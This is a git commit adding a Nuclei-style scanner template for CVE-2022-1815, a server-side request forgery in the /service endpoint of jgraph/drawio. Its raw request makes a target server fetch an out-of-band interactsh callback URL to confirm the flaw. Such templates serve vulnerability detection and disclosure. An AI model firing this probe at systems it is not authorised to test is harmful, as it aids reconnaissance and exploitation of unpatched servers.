Create CVE-2022-1815

patch-1
amit-jd 2022-07-29 18:25:26 +05:30 committed by GitHub
parent 1cb4a74be1
commit b359fb30a9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 27 additions and 0 deletions

View File

@ -0,0 +1,27 @@
id: CVE-2022-1815
info:
name: jgraph/drawio - Server Side Request Forgery
author: amit-jd
severity: medium
description: SSRF in /service endpoint in jgraph/drawio pripr to 18.1.2
reference:
- https://huntr.dev/bounties/6e856a25-9117-47c6-9375-52f78876902f/
tags: cve,cve2022,drawio,jgraph,ssrf
requests:
- raw:
- |
GET /service/0/{{interactsh-url}} HTTP/2
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: interactsh_protocol
words:
- "http"